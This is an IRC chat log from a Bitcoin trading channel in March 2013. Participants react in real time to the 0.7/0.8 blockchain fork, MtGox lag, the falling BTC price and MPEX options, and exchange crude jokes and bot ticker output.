BitHub well... i have no idea. Mar 12 03:51:29 k thats all i care about Mar 12 03:51:29 lol Mar 12 03:51:32 gesell prolly. Mar 12 03:51:35 lol@ bithub resumes Mar 12 03:51:37 gesell: this will spill over into all manner of discussion Mar 12 03:51:48 this will probably be the foundation of all further discussions Mar 12 03:51:55 dja see what i did there ? Mar 12 03:51:59 well, if anyone want's to short s.mpoe, i have a fair amout of shares available Mar 12 03:52:05 what is the point of the foundation Mar 12 03:52:10 smickles i think op was discussing shorting btc Mar 12 03:52:17 oh Mar 12 03:52:18 BitHub: they supply the biscuit Mar 12 03:52:19 poo Mar 12 03:52:26 i dont have the context, but ok Mar 12 03:52:35 buy puts :P Mar 12 03:52:37 dub: biscuit? Mar 12 03:52:45 vampireb mkay. who put the db in there ? Mar 12 03:52:46 the one in the middle Mar 12 03:53:00 who? i dont know, satoshi? Mar 12 03:53:12 bdb has issues, not 0.8 Mar 12 03:53:12 right. Mar 12 03:53:17 ;;goxlag Mar 12 03:53:18 38.016469 seconds Mar 12 03:53:25 you make an upgrade that fucks up the network, it's not the db, it's not satoshi, it;s you. Mar 12 03:53:28 ;;ticker Mar 12 03:53:28 that's how things work. Mar 12 03:53:28 BTCUSD ticker | Best bid: 45.01000, Best ask: 45.90277, Bid-ask spread: 0.89277, Last trade: 46.50000, 24 hour volume: 70342.96544144, 24 hour low: 43.11000, 24 hour high: 48.46900, 24 hour vwap: 46.71424 Mar 12 03:53:36 hurr. Mar 12 03:53:50 again Mar 12 03:53:53 untradable Mar 12 03:53:53 did testnet testing not catch this due to atomic transaction size blah blah? Mar 12 03:53:55 38 seconds Mar 12 03:53:59 and no ddos afaik Mar 12 03:54:00 its only 38 man Mar 12 03:54:04 fuckin lame Mar 12 03:54:05 well guess what, that's why when I last time I met gavin he was looking to hire QA Mar 12 03:54:06 tards. Mar 12 03:54:08 it was over 2000 last night Mar 12 03:54:14 with no volume at all Mar 12 03:54:22 over 9k really pisses me. Mar 12 03:54:47 kakobrekla: gotta fix it :) Mar 12 03:54:50 I've only seen it >9000 once Mar 12 03:55:03 myea. Mar 12 03:55:08 but today would be a good candidate Mar 12 03:55:17 if the 20k failsafe is still there Mar 12 03:55:40 "an easy way to do it is to go to home depot with 5 usd, buy stuff to make it happenj" Mar 12 03:56:29 ;;proxies Mar 12 03:56:29 Error: "proxies" is not a valid command. Mar 12 03:56:30 dub: 20k failsafe means what? Mar 12 03:56:34 $proxies Mar 12 03:56:35 smickles: ["http://mpex.coinbr.com"] Mar 12 03:56:48 !ticker mpex s.dice Mar 12 03:56:49 [MPEX:S.DICE] 1D: 0.00530001 / 0.00552804 / 0.0059998 (11830 shares, 65.40 BTC), 7D: 0.00300001 / 0.00514724 / 0.006 (228107 shares, 1,174.12 BTC), 30D: 0.00300001 / 0.00614247 / 0.0069 (2518785 shares, 15,471.58 BTC) Mar 12 03:57:06 $depth s.dice Mar 12 03:57:07 smickles: Bids: ['100 @ 530012', '81 @ 530011', '800 @ 530000', '500 @ 520000', '10 @ 520000'] Mar 12 03:57:08 smickles: Asks: ['9299 @ 569996', '1000 @ 569997', '2000 @ 570000', '148 @ 599990', '48346 @ 600000'] Mar 12 03:57:09 :) Mar 12 03:57:18 smickles: nice Mar 12 03:57:20 now lucif is gonna make some bullshit up how he calculated this could happen Mar 12 03:57:31 and we're gonna look like emperors with no clothes Mar 12 03:58:08 vampireb so he was looking to hire a qa. good for him. Mar 12 03:58:24 too bad he never got around to it. Mar 12 03:58:42 egg -> face Mar 12 03:58:43 well devs dont wanna do qa, and u can't really qa your own shit Mar 12 03:58:55 http://1.bp.blogspot.com/_E1j8gmCIr9w/TIQDRAZ9fbI/AAAAAAAAIOA/lYRso7Tr_fY/s1600/egg+on+your+face.png Mar 12 03:59:12 vampireb so ? Mar 12 03:59:13 meanwhile, LTC is surging Mar 12 03:59:20 Bowjob it would. Mar 12 03:59:58 so what? it isn't the end of the world. a minor hiccup Mar 12 03:59:58 "Every be very careful about accepting any transactions for the the next few hours" << what is that supposed to mean :P Mar 12 04:00:17 i'd take a bearish position on ltc, settled next month... Mar 12 04:00:19 how is one to be careful? Mar 12 04:00:31 never let a tragedy go to waste fellas. Plaster Satoshi Dice's name all over the news and posts if you can. Mar 12 04:00:34 the result: bitcoin foundation would be promoted as a saviour Mar 12 04:00:37 it not the end of the world? Mar 12 04:01:09 smickles that incoming txs might be wiped on fork merge Mar 12 04:01:36 vampireb it's hopefully the end of a certain misplace attitude. Mar 12 04:01:38 the-bucket-shop: what do you mean? Mar 12 04:01:39 in the devteam. Mar 12 04:01:49 aka "we know shit". Mar 12 04:01:50 attitudes? yea. Mar 12 04:01:58 I mean satoshidice can get famous off of this news Mar 12 04:02:03 also, what effect would this split have on hash/mining opporutunities? Mar 12 04:02:18 gesell it's a temporary thing. Mar 12 04:02:19 brief opportunities if that Mar 12 04:02:30 if it's not temporary then there's no mining oportunities Mar 12 04:02:36 mircea_popescu: i know, but how would you be careful about it. seems binary to me Mar 12 04:02:42 just stall them Mar 12 04:02:53 im not processing incoming on mpex till its resolved for instance. Mar 12 04:02:55 mircea_popescu: even if it is, it will take time for everyone to get on the proper chain, no... since apparently some versions will have to upgrade Mar 12 04:03:04 i'm out. this shit's boring. Mar 12 04:03:04 (course i have the advantaghe that my system is designed so such things don't affect me) Mar 12 04:03:18 gesell it seems downgrade moreover. Mar 12 04:03:19 ;;ticker Mar 12 04:03:20 BTCUSD ticker | Best bid: 43.50000, Best ask: 44.00000, Bid-ask spread: 0.50000, Last trade: 43.10000, 24 hour volume: 75255.63737110, 24 hour low: 43.10000, 24 hour high: 48.46900, 24 hour vwap: 46.55735 Mar 12 04:03:42 ah good that i sold at 47. need to figure when to rebuy Mar 12 04:04:23 2 Mar 12 04:04:25 ltc crossed 1 Mar 12 04:04:27 so, just trying to understand this. how is mtgox processing tx's now. this effects minders and merchants, not exchanges? Mar 12 04:04:32 im buying at $10 Mar 12 04:04:39 they dont process tx now? Mar 12 04:04:48 gsi don't think they are processing deposits/withdrawals Mar 12 04:04:49 you can trade with existing funds Mar 12 04:04:50 they dont process tx Mar 12 04:04:59 unless you fund or withdraw Mar 12 04:05:12 which is frozen iirc Mar 12 04:05:16 dub: perhaps i got the wrong term. if miners and merchants are told to wait, why not exchanges? Mar 12 04:05:28 miners need to switch to 0.7? Mar 12 04:05:42 echanges != merchant? Mar 12 04:05:47 ltc now at all time high to btc, and well over its old all time high to fiat Mar 12 04:05:47 gesell nobody is crediting incoming txs atm Mar 12 04:06:04 im trying to guage if there will be a queu of sells waiting to flood through exchanges once things get back to speed Mar 12 04:06:04 withdrawals are fine, but prolly people aren't doing it just to be safe. Mar 12 04:06:12 gesell its possible. Mar 12 04:06:24 gesell: there will, and wait till it hits the press Mar 12 04:06:33 yeah, outlook is a little bearish i guess Mar 12 04:06:43 I think $10 might be a bit bullish Mar 12 04:06:59 ;;ticker --last Mar 12 04:07:00 44.15000 Mar 12 04:07:14 I'm dropping down 200 BTC Mar 12 04:07:19 well, I can't wait to get myself some cheap coins if it drops Mar 12 04:07:21 so its a selfish question now but ive always invested long term. and now im wondering if its time to pull and wait Mar 12 04:07:26 pizzaman1337: same Mar 12 04:07:37 pull put. i'll sell 200 BTC for 8k Mar 12 04:08:27 still 25 coins every 10 minutes as far as I know. long term should be good gesell Mar 12 04:08:58 so far options aren't moving at all. Mar 12 04:09:06 the-bucket-shop: the long term is great. but the bible says to be a good steward with your money so im just wondering if im being a total idiot just holding at this point Mar 12 04:09:08 ;) Mar 12 04:09:09 im guessing people don't judge major drop likely. Mar 12 04:09:13 ;;view Mar 12 04:09:14 #13963 Mon Mar 11 18:45:10 2013 smickles SELL 1.0 0.7 blockchain @ 50 btc (None) Mar 12 04:09:21 got any offers yet ? Mar 12 04:09:30 yup Mar 12 04:09:42 r u srs? Mar 12 04:09:54 ill sell for 25 Mar 12 04:10:00 nope Mar 12 04:10:02 ;D Mar 12 04:10:07 what are you selling smickles, dont get it Mar 12 04:10:13 lol Mar 12 04:10:15 :D Mar 12 04:10:29 just selling the dat files? huh Mar 12 04:10:36 gesell: because of the current situation, people who are on .8 and want .7 need to redownload the chain Mar 12 04:10:36 heck ill sell for $13.29 Mar 12 04:10:38 ;;ticker --last Mar 12 04:10:38 43.49999 Mar 12 04:10:38 what i paid for Mar 12 04:10:39 lol Mar 12 04:10:51 a direct transfer from me to them would be a lot faster Mar 12 04:10:59 heh, okay Mar 12 04:11:13 im on 0.7 with last update 25 days ago Mar 12 04:11:24 bit is 42 Mar 12 04:11:29 ;;ticker Mar 12 04:11:30 BTCUSD ticker | Best bid: 43.20000, Best ask: 43.20758, Bid-ask spread: 0.00758, Last trade: 43.20000, 24 hour volume: 81127.52521536, 24 hour low: 42.00000, 24 hour high: 48.46900, 24 hour vwap: 46.26895 Mar 12 04:11:34 or was lol Mar 12 04:11:44 heh. Mar 12 04:12:03 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 12 04:12:04 !ticker ^OIX Mar 12 04:12:05 You cannot stop the clouds by the building of a ship. Mar 12 04:12:07 book aint problematic Mar 12 04:12:13 hold on if I'm still not upgraded I can sell something? Mar 12 04:12:18 $vwap ^oix Mar 12 04:12:19 smickles: {u'7d': {u'cnt': u'', u'min': u'4086787592', u'max': u'5325215905', u'vsa': u'954675808260', u'vsh': u'no', u'avg': u'5157005239'}, u'30d': {u'cnt': u'', u'min': u'', u'max': u'', u'vsa': u'', u'vsh': u'', u'avg': u''}, u'1d': {u'cnt': u'', u'min': u'', u'max': u'', u'vsa': u'', u'vsh': u'', u'avg': u''}} Mar 12 04:12:21 I'm trying to catch up Mar 12 04:12:24 but its impossible to trade Mar 12 04:12:27 with 30 sec lag Mar 12 04:12:33 its just a correction Mar 12 04:12:36 ;;goxlag Mar 12 04:12:36 157.044926 seconds Mar 12 04:12:40 ahahaha Mar 12 04:12:42 or 157 Mar 12 04:12:45 bejaysus Mar 12 04:12:59 :/ Mar 12 04:13:17 we need to summon satoshi Mar 12 04:13:20 Earth! Mar 12 04:13:44 does delay translate to some meaningful guage of load on gox? Mar 12 04:13:47 the OIX is at 51? Mar 12 04:13:52 yea Mar 12 04:13:55 wtf? Mar 12 04:14:43 help me satoshi nakamoto, you're our only hope Mar 12 04:14:48 ;;bc,24hprc Mar 12 04:14:49 46.31 Mar 12 04:14:57 only options today were 192 CALL @ 47 Mar 12 04:15:05 smickles nothing moved. Mar 12 04:15:10 yet at least. Mar 12 04:15:12 gesell: it translates to 'gox is incapable of handling moderate load' Mar 12 04:15:13 ;;calc 41/1.11 Mar 12 04:15:13 36.9369369369 Mar 12 04:15:28 dub for some values of moderate such as Mar 12 04:15:29 ;;calc 43/1.14 Mar 12 04:15:30 37.7192982456 Mar 12 04:15:34 hmm, any predictions on bit bets effected by this Mar 12 04:15:37 gesell: alternatively 'bitcoin is a joke' Mar 12 04:15:41 "what the average metro payment terminal in tokyo processes" Mar 12 04:15:51 ;;calc 75/1.62 Mar 12 04:15:51 46.2962962963 Mar 12 04:16:20 woops Mar 12 04:16:26 ;;calc 75/1.79 Mar 12 04:16:27 41.8994413408 Mar 12 04:16:28 ;;ticker Mar 12 04:16:29 BTCUSD ticker | Best bid: 42.00000, Best ask: 42.99000, Bid-ask spread: 0.99000, Last trade: 42.99000, 24 hour volume: 82087.73745767, 24 hour low: 42.00000, 24 hour high: 48.46900, 24 hour vwap: 46.19856 Mar 12 04:16:36 $1 spread Mar 12 04:16:52 oh i see the girl is adequately incensed Mar 12 04:16:57 paying her in btc was the best move ever. Mar 12 04:17:07 lol Mar 12 04:17:14 she's like "they did what" Mar 12 04:17:22 and im like "yes. here's pike bring heads" Mar 12 04:17:41 no rly? Mar 12 04:17:44 No cause we're too cool for testnet and elbow grease, gotta spend 16 hours a day on -dev talking about what we think of Satoshi Dice and how many whales fatass Gmaxwell could swallow whole. Mar 12 04:17:56 [MPEX] [O.BTCUSD.P750T] 10 @ 0.79079695 = 7.908 BTC [-] Mar 12 04:18:05 lol Mar 12 04:18:08 bunch of cock-meat sandwiches Mar 12 04:19:12 man, if those ddos kids were on to it Mar 12 04:19:19 they could REALLY fuck shit up right now Mar 12 04:19:29 ya let's keep that part a little quieter shall we. Mar 12 04:19:38 :D Mar 12 04:19:41 but I want $2 Mar 12 04:19:50 nevertheless. Mar 12 04:20:01 i see that as a goos ~8 btc spent Mar 12 04:20:04 *good Mar 12 04:20:10 this one might get closer http://bitbet.us/bet/283/btc-usd-at-mtgox-will-hit-50-in-march/ Mar 12 04:20:24 so in a situation like this, where the usd/btc may fall on confidence, am i safer being mostly invested in assets? Mar 12 04:20:32 or more exposed? Mar 12 04:20:36 ThickAsThieves possibly. hard to gauge Mar 12 04:20:39 why are you guys even here Mar 12 04:20:41 we have very little mkt history to go by Mar 12 04:20:51 all the cool kids are on bitcoin-dev Mar 12 04:20:51 davout urmom was on the rag. Mar 12 04:21:02 davout: to take advantage of fallouts? Mar 12 04:21:07 no, only the dubiously metrosexual are on -dev Mar 12 04:21:11 ThickAsThieves: if a significat amount of investors view their assets in terms of usd, then mebbe Mar 12 04:21:23 smickles this is the time to buy eskimoblobs thing! Mar 12 04:21:26 else: no Mar 12 04:21:33 i spent all day buying ltc assets Mar 12 04:21:53 where da ltc assets at Mar 12 04:21:55 mircea_popescu: no, this was clearly the time to <@assbot> [MPEX] [O.BTCUSD.P750T] 10 @ 0.79079695 = 7.908 BTC [-] Mar 12 04:21:59 grubles btcto ? Mar 12 04:22:02 litecoinglobal.com Mar 12 04:22:09 bitcoin just became fun again Mar 12 04:22:13 smickles short puts ? Mar 12 04:22:24 well, from your end Mar 12 04:22:34 I think s.dice and bitvps would benefit. except that s.dice money faucet is turned off. Mar 12 04:22:43 because of a bad btc price Mar 12 04:22:46 mircea_popescu: link? Mar 12 04:22:46 davout: totally Mar 12 04:23:10 ;;goxlag Mar 12 04:23:11 199.519792 seconds Mar 12 04:23:14 mircea_popescu: i bought them, if the bc,24hprc moves to the current spot, they break even Mar 12 04:23:15 ... Mar 12 04:23:26 go gox. Mar 12 04:23:33 ;;ticker --last Mar 12 04:23:33 41.40000 Mar 12 04:23:43 wasn't it over 1500 goxlag the other day Mar 12 04:24:23 coinbr down again? Mar 12 04:24:34 by all intents and purposes this is most definitely a crash Mar 12 04:24:49 this is early days Mar 12 04:25:05 lol, coinbr down. mpex.coinbr up Mar 12 04:25:07 imo a crash is good Mar 12 04:25:14 is mtgox even still trading ? Mar 12 04:25:16 crash comes when the media wakes up Mar 12 04:25:32 mircea_popescu: i also have those p310t's i bought a while back Mar 12 04:25:45 dub: not necessarily if it was taken care of quickly Mar 12 04:25:53 All right, I'm not panicking. Stay frosty Mar 12 04:26:11 Bowjob: don't panik, just buy when it all settles Mar 12 04:26:15 well Mar 12 04:26:39 ;;goxlag Mar 12 04:26:39 i shouldnt give any advice. i dont know jack. but i will hedge a little when it bottoms out anyway, for myself Mar 12 04:26:39 256.034339 seconds Mar 12 04:26:41 best thing to do now is buy beer with bitcoin Mar 12 04:26:42 ;;ticer Mar 12 04:26:42 Error: "ticer" is not a valid command. Mar 12 04:26:46 ;;ticker Mar 12 04:26:46 BTCUSD ticker | Best bid: 41.21110, Best ask: 41.40000, Bid-ask spread: 0.18890, Last trade: 41.40000, 24 hour volume: 86823.51454120, 24 hour low: 41.20000, 24 hour high: 48.46900, 24 hour vwap: 45.94411 Mar 12 04:26:48 possibly free beer Mar 12 04:26:54 gox is trying to trade as always Mar 12 04:27:03 actually, I could sell a few coins and buy back cheaper Mar 12 04:27:04 mhm Mar 12 04:27:07 the little trading engine that could Mar 12 04:27:16 ('nt) Mar 12 04:27:28 sorry grubles link for what ? Mar 12 04:28:46 odd 12 ours oga this chan was dead as dead, wake up to panic, ahhh btc :) Mar 12 04:29:26 ;;ticker Mar 12 04:29:28 BTCUSD ticker | Best bid: 40.60269, Best ask: 41.20000, Bid-ask spread: 0.59731, Last trade: 41.20000, 24 hour volume: 91789.11504056, 24 hour low: 40.01110, 24 hour high: 48.46900, 24 hour vwap: 45.66073 Mar 12 04:29:31 holy. Mar 12 04:29:44 lol Mar 12 04:29:45 Brb, panicking now Mar 12 04:30:36 ;;ticker Mar 12 04:30:36 BTCUSD ticker | Best bid: 40.37260, Best ask: 40.50000, Bid-ask spread: 0.12740, Last trade: 40.50000, 24 hour volume: 91802.34794623, 24 hour low: 40.01110, 24 hour high: 48.46900, 24 hour vwap: 45.65939 Mar 12 04:30:43 gox cant fall to far..people cant send gox coins to sell :) Mar 12 04:30:53 so what're the running odds that puts on mpex actually pay out if btc crashes very low? Mar 12 04:30:55 that's a point. Mar 12 04:30:59 wiggzz 100%. Mar 12 04:31:09 are they hedged? Mar 12 04:31:11 Chaang-Noi: but when they open it up, there could be a selloff Mar 12 04:31:22 yes, the only way to write them is by depositing capital Mar 12 04:31:31 after 6 trasactions could be a sell off yes... but people seeing it is fixed will be like, cheap coinz!!!!!!! Mar 12 04:31:33 pizzaman1337 very likely actually. Mar 12 04:31:41 im pretty sure i know how this drama will play out Mar 12 04:31:43 but, on a put required capital is not as great as they can fall Mar 12 04:32:02 fiat in the gox will beat the 6 confirm sell off Mar 12 04:32:16 something that really disturbs me right now is the number of way overpriced buy bids still sitting on bitcoin.de (a p2p exchange with pretty high volume) Mar 12 04:32:17 [MPEX] [O.BTCUSD.C490N] 10 @ 0.1721919 = 1.7219 BTC Mar 12 04:32:24 even if we go to $25 we will bounce right back up if this shit gets sorted quickly Mar 12 04:32:34 btw eta on this being fixed? Mar 12 04:32:48 mtgox price is at 31eu but you could still sell on bitcoin.de for 36 Mar 12 04:32:57 should be a few hours Mar 12 04:32:58 Chaang-Noi: as soon as the 0.7 chain is longer, I think. Not sure how far behind it is. Mar 12 04:33:04 gesell what time is it in de 4 am? Mar 12 04:33:09 yeah 3:30 Mar 12 04:33:13 ;;goxlag Mar 12 04:33:14 299.836034 seconds Mar 12 04:33:21 yeah id like to know the leanth of the chains Mar 12 04:33:26 wiggzz puts are bounded by fiat value Mar 12 04:33:31 ;;ticker Mar 12 04:33:32 you can't make more than 50 bucks on a 50 struck put Mar 12 04:33:33 BTCUSD ticker | Best bid: 40.01000, Best ask: 40.50000, Bid-ask spread: 0.49000, Last trade: 40.01000, 24 hour volume: 92084.38009144, 24 hour low: 40.01000, 24 hour high: 48.46900, 24 hour vwap: 45.64045 Mar 12 04:33:40 we are at 35 or 45 imho Mar 12 04:33:49 kakobrekla likely 35-37 ya Mar 12 04:33:50 im a bit worried selling on bitcoin.de though because if the buyer doesnt care to loose a bit of reputation they could just backout Mar 12 04:34:11 Chaang-Noi i would guess it will be solved within a couple of hourd. Mar 12 04:34:25 35, really? what, end of the month or just tomorrow or something? Mar 12 04:34:59 okay, ill go pay insurance for my truck.. and ship off some wild honey... i need to get afk anyway:) Mar 12 04:34:59 the thing with the bitcoin market is the reaction extends over a long period. so what you see happening now will continue in a similar manner with the EU wakes up Mar 12 04:35:19 hey, EU is awake Mar 12 04:35:25 nope Mar 12 04:35:31 well we are up Mar 12 04:35:35 me mircea_popescu and jurov Mar 12 04:35:49 is there some one else relevant? Mar 12 04:35:50 right, but in BTC the required collateral was only strike / spot Mar 12 04:35:51 ive watched it happen. a lul for a few hours then around 10am de time (8 9 whatever UK) a lot of activity Mar 12 04:35:53 ;;eightball Is this the end for bitcoin? Mar 12 04:35:53 No chance. Mar 12 04:35:59 :] Mar 12 04:36:02 The eightball has spoken! Mar 12 04:36:11 kakobrekla: I'm not really relevant, but most of the time I'm over there Mar 12 04:36:17 Everyone quit panicking, its just a few blocks. Tomorrow, we shall see $50 Mar 12 04:36:28 i <3 gribble Mar 12 04:36:28 davout> Chaang-Noi: approx 12 blocks difference Mar 12 04:36:40 pizzaman1337 i was just messing with gesell Mar 12 04:36:46 :) Mar 12 04:36:50 Bowjob: im not paniking. just aknowledging that the market is filled with a significant number of people investing more short term that will panik Mar 12 04:37:03 ;;ticker Mar 12 04:37:04 BTCUSD ticker | Best bid: 39.00000, Best ask: 40.00000, Bid-ask spread: 1.00000, Last trade: 40.00000, 24 hour volume: 99762.92721491, 24 hour low: 38.01051, 24 hour high: 48.46900, 24 hour vwap: 45.12452 Mar 12 04:37:04 ;;ticker --last Mar 12 04:37:04 40.00000 Mar 12 04:37:09 a round number! Mar 12 04:37:21 quick, take a screenshot! Mar 12 04:37:26 quick play SD Mar 12 04:37:27 shit is broken? Mar 12 04:37:46 prolly Mar 12 04:37:46 wiggzz: the additions funds needed would probably come from mpbor Mar 12 04:37:48 ;;goxlag Mar 12 04:37:49 355.023263 seconds Mar 12 04:37:51 say you write a put at 21, with USDBTC at 40, required collateral is 0.525 BTC? Mar 12 04:38:05 so does lag go only up? Mar 12 04:38:18 but if USDBTC drops to 1, payout is 20 USD which would be 20 BTC... way more than required collateral? Mar 12 04:38:26 imma go long on lag Mar 12 04:38:30 wiggzz: the mpbor assumes the risk of mpex options Mar 12 04:38:34 who can help me out? Mar 12 04:38:58 [MPEX] [O.BTCUSD.P430T] 1000 @ 0.14725493 = 147.2549 BTC [+] Mar 12 04:38:59 kakobrekla: help with what? Mar 12 04:39:01 i'll take the over on lag Mar 12 04:39:04 heh there we go Mar 12 04:39:07 smickles to go long on lag Mar 12 04:39:09 we need an MPSIC for goxlag Mar 12 04:39:10 !ticker m ^oix Mar 12 04:39:10 [MPEX] [O.BTCUSD.P450T] 1000 @ 0.17572879 = 175.7288 BTC [+] Mar 12 04:39:12 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 40.86787592 / 51.57005239 / 53.25215905 (no shares, 9,546.76 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 12 04:39:54 ;;ticker Mar 12 04:39:54 BTCUSD ticker | Best bid: 37.90000, Best ask: 38.00000, Bid-ask spread: 0.10000, Last trade: 38.00000, 24 hour volume: 101521.68067860, 24 hour low: 37.90000, 24 hour high: 48.46900, 24 hour vwap: 45.00561 Mar 12 04:40:00 woo Mar 12 04:40:02 deep. Mar 12 04:40:05 wiggzz that issue is taken care of by a little insurance premium on oputs issuance Mar 12 04:40:12 ;;bids 31 Mar 12 04:40:18 and in exchange i settle puts in fiat in case of utter collapse Mar 12 04:40:28 There are currently 33593.186 bitcoins demanded at or over 31.0 USD, worth 1149514.37586 USD in total. | Data vintage: 0.0061 seconds Mar 12 04:40:53 [MPEX] [O.BTCUSD.P430T] 1000 @ 0.15522008 = 155.2201 BTC [+] Mar 12 04:40:55 [MPEX] [O.BTCUSD.P450T] 1000 @ 0.18486613 = 184.8661 BTC [+] Mar 12 04:41:00 ok, good to know Mar 12 04:41:51 [MPEX] [O.BTCUSD.P390T] 1000 @ 0.1040628 = 104.0628 BTC [+] Mar 12 04:41:52 [MPEX] [O.BTCUSD.P410T] 1000 @ 0.12826263 = 128.2626 BTC [+] Mar 12 04:41:55 heh. Mar 12 04:41:58 !ticker m ^oix Mar 12 04:41:59 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 40.86787592 / 51.57005239 / 53.25215905 (no shares, 9,546.76 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 12 04:42:23 no srsly ? Mar 12 04:42:26 i should have shorted btc :) Mar 12 04:42:43 mircea_popescu: is that unchanged on the 7day? Mar 12 04:42:55 ;;ticker Mar 12 04:43:06 ;;goxlag Mar 12 04:43:06 365.309178 seconds Mar 12 04:43:15 BTCUSD ticker | Best bid: 37.80000, Best ask: 38.00000, Bid-ask spread: 0.20000, Last trade: 38.00000, 24 hour volume: 101597.26956421, 24 hour low: 37.80000, 24 hour high: 48.46900, 24 hour vwap: 45.00044 Mar 12 04:43:16 smickles yeh. i wonder wtf. Mar 12 04:43:27 $vwap ^oix Mar 12 04:43:28 smickles: {u'7d': {u'cnt': u'', u'min': u'4086787592', u'max': u'5325215905', u'vsa': u'954675808260', u'vsh': u'no', u'avg': u'5157005239'}, u'30d': {u'cnt': u'', u'min': u'', u'max': u'', u'vsa': u'', u'vsh': u'', u'avg': u''}, u'1d': {u'cnt': u'', u'min': u'', u'max': u'', u'vsa': u'', u'vsh': u'', u'avg': u''}} Mar 12 04:43:53 ;;bc,24hprc Mar 12 04:43:54 45.11 Mar 12 04:45:36 bitcoin.clarkmoody.com down... Mar 12 04:46:13 heh Mar 12 04:47:28 $45.51 Mar 12 04:47:30 according to coinlab Mar 12 04:47:31 lol Mar 12 04:47:39 ;;goxlag Mar 12 04:47:39 564.66904 seconds Mar 12 04:47:42 damn Mar 12 04:47:44 37 on bitstamp Mar 12 04:47:46 89 min ago Mar 12 04:47:57 nicely scaling there gox Mar 12 04:48:01 linear even Mar 12 04:48:07 ;;goxlag Mar 12 04:48:08 584.930613 seconds Mar 12 04:48:11 so gox is turning in historcial btc chart reading site Mar 12 04:48:43 lol Mar 12 04:48:49 how much will BTC drop by do you think Mar 12 04:48:49 https://coinbase.com/network/blocks block races website Mar 12 04:48:57 this is a serious problem Mar 12 04:48:58 to $25 Mar 12 04:49:03 even if you guys find it funny Mar 12 04:49:17 serious tranders dont suffer shit like this Mar 12 04:49:21 traders Mar 12 04:49:35 you want to bring wall street to btc? Mar 12 04:49:36 https://blockchain.info/orphaned-blocks Mar 12 04:49:37 kill gox Mar 12 04:50:16 [MPEX] [O.BTCUSD.C410T] 7 @ 0.12612881 = 0.8829 BTC [-] Mar 12 04:50:18 kakobrekla: first, im sorry this is all happening. im sure it is ruining some peoples day. but why do you see it as a mtgox problem? Mar 12 04:50:32 pigeons see my link, i found that helpful Mar 12 04:50:47 gesell: traditional markes shut down at times like these Mar 12 04:50:55 lol Mar 12 04:50:58 tell me something Mar 12 04:51:04 when you go to a foregin country Mar 12 04:51:11 and you need some of their currecny Mar 12 04:51:16 do you go to your FX broker to get it? Mar 12 04:51:23 I wish Mar 12 04:51:24 or to buy phycal gold? Mar 12 04:51:35 kakobrekla you're telling me ? Mar 12 04:51:42 im telling gesell Mar 12 04:51:48 yeah. Mar 12 04:51:51 fuycking painful shit. Mar 12 04:51:54 whats a time like this for traditional markets? Mar 12 04:51:55 or if you trade stocks Mar 12 04:51:59 do you have a broker Mar 12 04:52:02 pigeons are we merged ? Mar 12 04:52:04 or do you go on the trading floor yourself Mar 12 04:52:06 and yell there Mar 12 04:52:11 dub: movements over x% Mar 12 04:52:19 halelujah Mar 12 04:52:23 [MPEX] [O.BTCUSD.C450T] 1 @ 0.17769942 BTC [-] Mar 12 04:52:24 kakobrekla: sorry, im not following Mar 12 04:52:24 [MPEX] [O.BTCUSD.C450T] 9 @ 0.12120114 = 1.0908 BTC [-] Mar 12 04:52:32 :\ Mar 12 04:52:35 11 blocks Mar 12 04:52:38 ;;ticker --last Mar 12 04:52:40 36.80000 Mar 12 04:52:53 [MPEX] [O.BTCUSD.P390T] 1000 @ 0.10590572 = 105.9057 BTC [+] Mar 12 04:53:02 [MPEX] [O.BTCUSD.P430T] 1000 @ 0.15775711 = 157.7571 BTC [+] Mar 12 04:53:04 [MPEX] [O.BTCUSD.P410T] 1000 @ 0.13044382 = 130.4438 BTC [+] Mar 12 04:53:44 ;;ticker Mar 12 04:53:45 BTCUSD ticker | Best bid: 36.68160, Best ask: 38.00000, Bid-ask spread: 1.31840, Last trade: 38.00000, 24 hour volume: 105824.64907266, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.68534 Mar 12 04:53:58 Are we allowed to do transactions Mar 12 04:53:59 ? Mar 12 04:54:05 yea Mar 12 04:54:20 it might be risky on the chain tho Mar 12 04:54:56 i dont know, im not a fan of kill switches so i'd like to see bitcoin-dev's learn from this so that similar bugs in the future can be handled without shutting anything down Mar 12 04:55:15 ;;goxlag Mar 12 04:55:15 444.693169 seconds Mar 12 04:55:16 I can sell coins now at 38.50 now Mar 12 04:55:22 before this shit blows out of proportions Mar 12 04:55:23 goxlag is dropping? Mar 12 04:55:32 it was over 600 a moment ago Mar 12 04:55:48 ;;goxlag-but-make-it-intersting-please Mar 12 04:55:49 Error: "goxlag-but-make-it-intersting-please" is not a valid command. Mar 12 04:56:22 ;;goxlag Mar 12 04:56:22 369.036619 seconds Mar 12 04:56:27 gesell: i think most btc exchanges are anti-killswitch Mar 12 04:57:21 ;;bc,24hprc Mar 12 04:57:22 44.92 Mar 12 04:58:01 ;;goxlag Mar 12 04:58:02 ;;calc 45/1.18 Mar 12 04:58:02 38.1355932203 Mar 12 04:58:02 338.887145 seconds Mar 12 04:59:13 [MPEX] [O.BTCUSD.P370T] 1000 @ 0.08420338 = 84.2034 BTC [+] Mar 12 04:59:17 ;;ticker Mar 12 04:59:18 BTCUSD ticker | Best bid: 39.01138, Best ask: 40.00000, Bid-ask spread: 0.98862, Last trade: 40.00000, 24 hour volume: 107876.01377001, 24 hour low: 36.65000, 24 hour high: 48.46900, 24 hour vwap: 44.55733 Mar 12 04:59:50 this somehow reminds me of http://imgs.xkcd.com/comics/estimation.png Mar 12 05:00:52 lol Mar 12 05:01:19 question... so just curious would the initial errors that 0.7 clients were reporting (http://sourceforge.net/mailarchive/message.php?msg_id=30587843) that sipa mentions, would those just be bug reports to bitcointalk or to sourceforge bug tracker or? just curious where alerts of such issues before its plastered everywhere would come from Mar 12 05:01:42 did anyone see where this first started and was coming to the surface? Mar 12 05:02:29 blockchain.info is still scrolling satoshidice bets. I wonder which blockchain Mar 12 05:03:34 they only disabled payouts Mar 12 05:03:42 (obv) Mar 12 05:03:48 ;;goxlag Mar 12 05:03:49 483.195032 seconds Mar 12 05:04:35 i wonder if apart from the discussion about soft limits, we will also start to see features that give more oversight and regulation, even if more symbolic than bernanke like. such letting bitcoin-dev patch or blacklist more quickly or perhaps at will Mar 12 05:04:56 [MPEX] 